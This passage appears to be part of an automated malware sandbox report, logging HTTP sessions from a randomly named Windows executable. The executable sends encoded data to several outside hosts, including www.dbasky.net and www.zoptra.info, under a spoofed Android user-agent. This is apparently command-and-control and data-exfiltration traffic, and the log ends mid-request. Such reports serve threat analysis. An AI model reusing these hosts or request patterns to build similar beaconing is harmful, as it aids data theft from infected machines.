                                                                                                                      Data Raw: 73 6e 30 50 4c 4e 3d 41 64 6d 68 2f 50 35 74 41 34 4d 35 58 55 44 54 47 39 64 6a 39 78 37 47 57 4b 37 6d 4d 34 54 34 4f 47 73 41 63 62 32 4b 33 64 45 31 2f 55 39 70 73 4b 61 36 76 30 42 37 6c 73 50 34 34 68 58 33 6c 56 68 48 6e 6f 4e 72 66 31 41 58 36 30 4c 51 70 32 55 63 36 32 78 41 42 50 68 32 50 48 63 6c 6c 58 64 72 36 66 35 70 62 65 46 41 4b 71 47 44 44 72 50 65 35 52 38 54 72 71 4c 41 63 31 59 53 52 33 6e 48 74 6d 41 4b 56 69 6e 42 63 5a 72 62 66 45 47 75 4a 49 38 32 7a 4d 4d 32 6a 63 30 70 5a 44 61 57 76 6f 4d 53 46 68 33 73 53 6a 79 6b 64 44 79 49 53 50 47 73 54 73 76 62 4c 6b 4e 59 52 2b 53 6e 68 71 70 35 2f 43 6d 4f 59 54 50 55 6e 51 2f 41 35 4a 30 63 65 61 64 38 47 68 6b 4f 61 73 35 63 49 55 7a 4d 4c 4a 58 30 73 53 6d 63 33 59 59 51 38 36 59 70 73 46 62 44 4d 7a 5a 73 51 6f 43 65 65 6b 2f 58 64 41 4b 71 77 64 79 41 78 6a 58 65 74 47 63 54 2b 48 57 57 41 55 72 6b 51 6e 31 72 66 36 61 70 78 48 5a 57 75 31 4b 51 30 67 65 2b 7a 70 65 45 63 42 72 61 61 52 75 51 53 35 2b 38 49 4c 75 58 51 58 4e [TRUNCATED]
                                                                                                                      Data Ascii: sn0PLN=Admh/P5tA4M5XUDTG9dj9x7GWK7mM4T4OGsAcb2K3dE1/U9psKa6v0B7lsP44hX3lVhHnoNrf1AX60LQp2Uc62xABPh2PHcllXdr6f5pbeFAKqGDDrPe5R8TrqLAc1YSR3nHtmAKVinBcZrbfEGuJI82zMM2jc0pZDaWvoMSFh3sSjykdDyISPGsTsvbLkNYR+Snhqp5/CmOYTPUnQ/A5J0cead8GhkOas5cIUzMLJX0sSmc3YYQ86YpsFbDMzZsQoCeek/XdAKqwdyAxjXetGcT+HWWAUrkQn1rf6apxHZWu1KQ0ge+zpeEcBraaRuQS5+8ILuXQXN3MyiYObFlttArfuPXoTvbCAEn00sHWOuQuI7Vi0YN4m5WQ1eMtjeCk6dWYMfwsuIZLYQXGsBwVsK+Rco9wBrUC7g+vrLhK4nOm7kKxOdFHVx47wlidCUpX2gNvdY3XtFLS7OzTX4Zd+OF4Bu/OmOXIV47PEk79SR74vfSytz5bJgqZQmFl7KngQ0TprMAM6YCeDPA7fOGa3mornt/YxVDqhpaM1vOvvbc/6j/+kGhUWC3SiaJNnJeGSWODJvLo59rDdZz/RJ3oDS+pjl+M7b16W+tLTWBlTCbM/QY+zDGJZu56PIX4vWs0jqdeN4aqC0cFS+cuWcNwDuoQ3RZ9APYaRbvQ4Qvb+tfag2hCgf711bxo4YOZGUCvA00ZYvuoBZCJvnuqTrivsZN3gZbCKbxJofDmH6HKBkH1QTNA9aLnndXLCl4T5Kk9TiqIYJXBLwe728itgv2DtyDiTkvDvgsGYKUIo2B2nRDy/A/OydSolBA7auzuLr2K418bEQmFw4tacnsEqf39WH4XkBZbyQRc8iqbO7zeCid65kxF04KnFQ0JH3YBO61+3pNCe9V5NuFgc9myhrkE5pHGzkdjx/hVhDkXacLO5GvzKqmrfHyn2hLc5BtFtf1lCqx3hmHrRuC4jQmodqk1PjgVZpJ/DEawUQ0Vk/xB1jBU [TRUNCATED]
                                                                                                                      Nov 1, 2024 09:19:22.270983934 CET312INHTTP/1.1 404 Not Found
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 01 Nov 2024 08:19:22 GMT
                                                                                                                      Content-Type: text/html
                                                                                                                      Content-Length: 148
                                                                                                                      Connection: close
                                                                                                                      ETag: "66df9c88-94"
                                                                                                                      Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20
                                                                                                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      20192.168.2.46291838.47.232.160803608C:\Program Files (x86)\vqwlUwyMIBzWEKfmXxuwFhXFTcJlpydhbFPIEyDRMlNNnCqsCwCoHYZRfqN\RprkEKYwQARXc.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Nov 1, 2024 09:19:23.900376081 CET526OUTGET /wh1i/?sn0PLN=NfOB86VXI4wsVz/XO9ACyDnBWrbPRq/QJ2w3Rs+6xYlcxVFOr5mbmHJ2iOb+4RiHynZrudFNXkx38yGLhxQe11Zee6oqKWgky3dD2swdesJmFdrAGLP7kwM=&xZa=jpgDOVH8PXW8oBA0 HTTP/1.1
                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                      Accept-Language: en-US
                                                                                                                      Host: www.44kdd.top
                                                                                                                      Connection: close
                                                                                                                      User-Agent: Mozilla/5.0 (Linux; U; Android 4.1.1; pt-br; Positivo Ypy L1050 Build/JRO03H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
                                                                                                                      Nov 1, 2024 09:19:24.847829103 CET312INHTTP/1.1 404 Not Found
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 01 Nov 2024 08:19:24 GMT
                                                                                                                      Content-Type: text/html
                                                                                                                      Content-Length: 148
                                                                                                                      Connection: close
                                                                                                                      ETag: "66df9c88-94"
                                                                                                                      Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20
                                                                                                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      21192.168.2.46291934.92.109.131803608C:\Program Files (x86)\vqwlUwyMIBzWEKfmXxuwFhXFTcJlpydhbFPIEyDRMlNNnCqsCwCoHYZRfqN\RprkEKYwQARXc.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Nov 1, 2024 09:19:31.561894894 CET778OUTPOST /qgza/ HTTP/1.1
                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                      Accept-Language: en-US
                                                                                                                      Host: www.dbasky.net
                                                                                                                      Origin: http://www.dbasky.net
                                                                                                                      Referer: http://www.dbasky.net/qgza/
                                                                                                                      Content-Length: 203
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      Connection: close
                                                                                                                      Cache-Control: no-cache
                                                                                                                      User-Agent: Mozilla/5.0 (Linux; U; Android 4.1.1; pt-br; Positivo Ypy L1050 Build/JRO03H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
                                                                                                                      Data Raw: 73 6e 30 50 4c 4e 3d 6e 57 33 36 66 49 67 7a 73 75 6a 47 6d 31 50 53 66 2b 58 41 6c 7a 4f 6e 30 33 6a 32 58 6d 68 4b 65 62 61 73 50 4f 6a 33 6a 64 31 45 45 63 38 73 39 45 35 58 50 77 69 36 41 48 37 4e 51 50 43 66 52 72 5a 4b 35 38 45 6c 70 44 4c 73 68 47 33 47 34 35 6b 6a 73 30 7a 4d 69 47 6b 65 48 35 61 4a 36 6b 47 51 49 68 42 66 36 46 6c 49 30 4e 36 50 76 74 75 63 41 6c 62 55 33 51 52 42 56 53 41 78 31 6b 4a 32 4f 46 69 76 69 55 48 73 4d 38 2f 75 37 6b 76 32 75 4e 49 45 71 53 56 32 38 7a 64 69 61 61 2b 78 39 36 51 7a 56 52 48 43 6b 42 71 6c 56 4c 74 2b 44 4e 61 31 34 32 54 2f 6d 62 6e 31 6c 67 3d 3d
                                                                                                                      Data Ascii: sn0PLN=nW36fIgzsujGm1PSf+XAlzOn03j2XmhKebasPOj3jd1EEc8s9E5XPwi6AH7NQPCfRrZK58ElpDLshG3G45kjs0zMiGkeH5aJ6kGQIhBf6FlI0N6PvtucAlbU3QRBVSAx1kJ2OFiviUHsM8/u7kv2uNIEqSV28zdiaa+x96QzVRHCkBqlVLt+DNa142T/mbn1lg==
                                                                                                                      Nov 1, 2024 09:19:32.502451897 CET289INHTTP/1.1 404 Not Found
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 01 Nov 2024 08:19:32 GMT
                                                                                                                      Content-Type: text/html
                                                                                                                      Content-Length: 146
                                                                                                                      Connection: close
                                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      22192.168.2.46292034.92.109.131803608C:\Program Files (x86)\vqwlUwyMIBzWEKfmXxuwFhXFTcJlpydhbFPIEyDRMlNNnCqsCwCoHYZRfqN\RprkEKYwQARXc.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Nov 1, 2024 09:19:34.106338024 CET798OUTPOST /qgza/ HTTP/1.1
                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                      Accept-Language: en-US
                                                                                                                      Host: www.dbasky.net
                                                                                                                      Origin: http://www.dbasky.net
                                                                                                                      Referer: http://www.dbasky.net/qgza/
                                                                                                                      Content-Length: 223
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      Connection: close
                                                                                                                      Cache-Control: no-cache
                                                                                                                      User-Agent: Mozilla/5.0 (Linux; U; Android 4.1.1; pt-br; Positivo Ypy L1050 Build/JRO03H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
                                                                                                                      Data Raw: 73 6e 30 50 4c 4e 3d 6e 57 33 36 66 49 67 7a 73 75 6a 47 70 31 2f 53 65 5a 6a 41 70 44 4f 6f 78 33 6a 32 41 32 68 4f 65 62 6d 73 50 4c 44 6e 6a 76 68 45 45 39 4d 73 38 47 42 58 49 77 69 36 59 58 37 49 55 50 43 45 52 73 52 34 35 38 49 6c 70 44 50 73 68 47 48 47 37 4b 64 52 74 6b 7a 4b 74 6d 6b 63 59 4a 61 4a 36 6b 47 51 49 67 68 78 36 46 74 49 33 39 71 50 39 66 4b 66 4a 46 62 54 77 51 52 42 52 53 41 31 31 6b 49 6a 4f 41 65 42 69 53 4c 73 4d 35 44 75 37 56 76 33 6c 4e 49 64 75 53 56 6c 39 32 74 6d 58 76 54 44 6a 4a 68 57 55 56 7a 56 6f 6e 6e 2f 45 36 4d 70 52 4e 2b 47 6c 78 61 4c 72 59 61 38 2b 74 43 2b 51 64 75 59 76 5a 4f 4e 76 71 30 79 50 53 72 41 4d 6f 77 3d
                                                                                                                      Data Ascii: sn0PLN=nW36fIgzsujGp1/SeZjApDOox3j2A2hOebmsPLDnjvhEE9Ms8GBXIwi6YX7IUPCERsR458IlpDPshGHG7KdRtkzKtmkcYJaJ6kGQIghx6FtI39qP9fKfJFbTwQRBRSA11kIjOAeBiSLsM5Du7Vv3lNIduSVl92tmXvTDjJhWUVzVonn/E6MpRN+GlxaLrYa8+tC+QduYvZONvq0yPSrAMow=
                                                                                                                      Nov 1, 2024 09:19:35.070667028 CET289INHTTP/1.1 404 Not Found
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 01 Nov 2024 08:19:34 GMT
                                                                                                                      Content-Type: text/html
                                                                                                                      Content-Length: 146
                                                                                                                      Connection: close
                                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      23192.168.2.46292134.92.109.131803608C:\Program Files (x86)\vqwlUwyMIBzWEKfmXxuwFhXFTcJlpydhbFPIEyDRMlNNnCqsCwCoHYZRfqN\RprkEKYwQARXc.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Nov 1, 2024 09:19:36.650254011 CET10880OUTPOST /qgza/ HTTP/1.1
                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                      Accept-Language: en-US
                                                                                                                      Host: www.dbasky.net
                                                                                                                      Origin: http://www.dbasky.net
                                                                                                                      Referer: http://www.dbasky.net/qgza/
                                                                                                                      Content-Length: 10303
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      Connection: close
                                                                                                                      Cache-Control: no-cache
                                                                                                                      User-Agent: Mozilla/5.0 (Linux; U; Android 4.1.1; pt-br; Positivo Ypy L1050 Build/JRO03H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
                                                                                                                      Data Raw: 73 6e 30 50 4c 4e 3d 6e 57 33 36 66 49 67 7a 73 75 6a 47 70 31 2f 53 65 5a 6a 41 70 44 4f 6f 78 33 6a 32 41 32 68 4f 65 62 6d 73 50 4c 44 6e 6a 76 35 45 46 50 30 73 39 68 56 58 4a 77 69 36 47 48 37 4a 55 50 44 65 52 71 35 47 35 38 55 66 70 42 48 73 7a 33 6e 47 36 37 64 52 69 6b 7a 4b 76 6d 6b 5a 48 35 61 51 36 6b 57 55 49 67 52 78 36 46 74 49 33 37 75 50 2f 4e 75 66 46 6c 62 55 33 51 52 64 56 53 41 4e 31 6e 34 7a 4f 42 71 2f 68 69 72 73 4d 5a 7a 75 35 48 33 33 73 4e 49 66 70 53 55 34 39 32 6f 34 58 72 79 36 6a 4a 6b 39 55 53 62 56 35 68 47 55 51 62 34 7a 53 64 57 34 6e 51 2f 76 75 62 36 42 37 71 32 67 5a 59 79 64 39 73 75 67 72 35 64 2f 4e 69 58 34 66 39 31 57 54 6d 36 46 48 4e 44 4b 48 69 45 76 37 58 55 50 38 6b 30 70 50 61 68 63 31 46 7a 4b 4b 66 36 41 55 65 73 67 2b 72 33 33 35 35 6d 6a 6b 53 71 79 78 2b 53 49 30 55 67 68 42 5a 59 49 66 64 43 7a 56 72 37 74 64 38 67 41 2f 57 70 34 59 76 69 5a 55 43 32 76 48 6f 71 4a 31 65 54 35 6d 6f 75 56 48 6f 37 45 42 72 6c 66 5a 41 42 39 4a 35 69 54 59 58 77 [TRUNCATED]
                                                                                                                      Data Ascii: sn0PLN=nW36fIgzsujGp1/SeZjApDOox3j2A2hOebmsPLDnjv5EFP0s9hVXJwi6GH7JUPDeRq5G58UfpBHsz3nG67dRikzKvmkZH5aQ6kWUIgRx6FtI37uP/NufFlbU3QRdVSAN1n4zOBq/hirsMZzu5H33sNIfpSU492o4Xry6jJk9USbV5hGUQb4zSdW4nQ/vub6B7q2gZYyd9sugr5d/NiX4f91WTm6FHNDKHiEv7XUP8k0pPahc1FzKKf6AUesg+r3355mjkSqyx+SI0UghBZYIfdCzVr7td8gA/Wp4YviZUC2vHoqJ1eT5mouVHo7EBrlfZAB9J5iTYXwd093Aocyo1BKXCr8WpVQ+Lpg/gJ3r4LMl+0nd+xSeY5amZPoK2q+t4Mzp9H5qwSXDVQTI9skr9MFwq0jL/gcyIwTSIvgORU3ZwYvSBdvruTe7JQo308sWtc0KsLBk0HO5uKwDq9da2vEo7hwj/GGREU3OBvfJgcY45lFb04nDpcAKvgqJKCX+BhzlbsOXHVZwCFX+1s3QP01puTGWTLTpULOuqEgiGszPbPeaGaHQU0M5zk++exWJKfZq5i9rBTpsnML9Q+rBiwHI62bZxqhbXQabYs3ZXq0Y9qtL4o4AyyFXcErufJLuhblm45kwP/5JWurKPUarpHVNc6XV+yqzmO/MFSUJGjSz1qNNdXtL2HzzNp9hlEUswqwNBwt+E+rSz+wbJFpC3Z/uUEYoXSI1quAsOHMwDvMVCJ/e1jgUAbMRbYDwnH+u1fFWCW8rsaodH/f6vUL8JygUWRNWY4YaHvS3QwwKemz003G5FXaRHHyQA9wFOlnwUU5bzcrKUtBGDvHhW6NCmNce/fggfryjy9kL/FdQKerrE7SBcLpmw+Makj9YioSVYOvRu9ga+6dt2mGJiGAGS9TUz3ahHz3FrW2pwpxtl/QC4FfceeJs5Lch/ggboul9vluUV7PNTB61wORYwOZJpGV/fV1q8tAJspdb7LBNcEJ05 [TRUNCATED]
                                                                                                                      Nov 1, 2024 09:19:37.584239960 CET289INHTTP/1.1 404 Not Found
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 01 Nov 2024 08:19:37 GMT
                                                                                                                      Content-Type: text/html
                                                                                                                      Content-Length: 146
                                                                                                                      Connection: close
                                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      24192.168.2.46292234.92.109.131803608C:\Program Files (x86)\vqwlUwyMIBzWEKfmXxuwFhXFTcJlpydhbFPIEyDRMlNNnCqsCwCoHYZRfqN\RprkEKYwQARXc.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Nov 1, 2024 09:19:39.213932991 CET527OUTGET /qgza/?sn0PLN=qUfac4sEgcT1lV7He6HHqRuPwSXpeUZhJqCALOrqisMgJsMY6XUJFSDaK0uTR8zfEfRb7N0j/DnowCq79bdHl1fL6DN9OJHq4gCFNVkq5WVy1qGx7uu1RVo=&xZa=jpgDOVH8PXW8oBA0 HTTP/1.1
                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                      Accept-Language: en-US
                                                                                                                      Host: www.dbasky.net
                                                                                                                      Connection: close
                                                                                                                      User-Agent: Mozilla/5.0 (Linux; U; Android 4.1.1; pt-br; Positivo Ypy L1050 Build/JRO03H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
                                                                                                                      Nov 1, 2024 09:19:40.158385038 CET289INHTTP/1.1 404 Not Found
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 01 Nov 2024 08:19:40 GMT
                                                                                                                      Content-Type: text/html
                                                                                                                      Content-Length: 146
                                                                                                                      Connection: close
                                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      25192.168.2.462923162.0.211.143803608C:\Program Files (x86)\vqwlUwyMIBzWEKfmXxuwFhXFTcJlpydhbFPIEyDRMlNNnCqsCwCoHYZRfqN\RprkEKYwQARXc.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Nov 1, 2024 09:19:45.385766029 CET781OUTPOST /icpx/ HTTP/1.1
                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                      Accept-Language: en-US
                                                                                                                      Host: www.zoptra.info
                                                                                                                      Origin: http://www.zoptra.info
                                                                                                                      Referer: http://www.zoptra.info/icpx/
                                                                                                                      Content-Length: 203
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      Connection: close
                                                                                                                      Cache-Control: no-cache
                                                                                                                      User-Agent: Mozilla/5.0 (Linux; U; Android 4.1.1; pt-br; Positivo Ypy L1050 Build/JRO03H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
                                                                                                                      Data Raw: 73 6e 30 50 4c 4e 3d 4a 55 73 2f 37 6f 32 37 6e 31 65 39 54 34 77 6a 52 74 73 56 70 6a 2b 49 36 49 76 33 31 58 58 62 39 6c 78 52 55 47 50 4d 2f 5a 37 31 38 62 53 33 36 62 59 4c 76 4c 48 38 65 36 78 4f 33 6a 61 73 42 68 5a 4c 43 49 6a 76 44 77 6b 69 36 56 56 64 52 56 35 2f 59 77 6a 67 32 41 4a 63 79 2b 78 51 4e 6d 43 70 35 79 46 65 6f 38 33 61 6e 30 2f 35 62 46 61 6a 69 31 5a 78 6b 77 2f 38 4a 51 62 6f 68 4b 53 6b 33 5a 6d 31 45 45 5a 4f 46 46 4a 34 74 4e 56 67 4f 6a 4d 51 72 68 76 54 42 4b 4d 34 30 4d 52 74 4d 32 39 48 4d 30 54 42 6e 74 74 78 2b 41 63 49 58 2b 64 51 4f 52 51 66 32 54 4e 50 51 67 3d 3d
                                                                                                                      Data Ascii: sn0PLN=JUs/7o27n1e9T4wjRtsVpj+I6Iv31XXb9lxRUGPM/Z718bS36bYLvLH8e6xO3jasBhZLCIjvDwki6VVdRV5/Ywjg2AJcy+xQNmCp5yFeo83an0/5bFaji1Zxkw/8JQbohKSk3Zm1EEZOFFJ4tNVgOjMQrhvTBKM40MRtM29HM0TBnttx+AcIX+dQORQf2TNPQg==
                                                                                                                      Nov 1, 2024 09:19:46.091547012 CET533INHTTP/1.1 404 Not Found
                                                                                                                      Date: Fri, 01 Nov 2024 08:19:45 GMT
                                                                                                                      Server: Apache
                                                                                                                      Content-Length: 389
                                                                                                                      Connection: close
                                                                                                                      Content-Type: text/html
                                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                                      Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      26192.168.2.462924162.0.211.143803608C:\Program Files (x86)\vqwlUwyMIBzWEKfmXxuwFhXFTcJlpydhbFPIEyDRMlNNnCqsCwCoHYZRfqN\RprkEKYwQARXc.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Nov 1, 2024 09:19:48.028384924 CET801OUTPOST /icpx/ HTTP/1.1
                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                      Accept-Language: en-US
                                                                                                                      Host: www.zoptra.info
                                                                                                                      Origin: http://www.zoptra.info
                                                                                                                      Referer: http://www.zoptra.info/icpx/
                                                                                                                      Content-Length: 223
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      Connection: close
                                                                                                                      Cache-Control: no-cache
                                                                                                                      User-Agent: Mozilla/5.0 (Linux; U; Android 4.1.1; pt-br; Positivo Ypy L1050 Build/JRO03H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
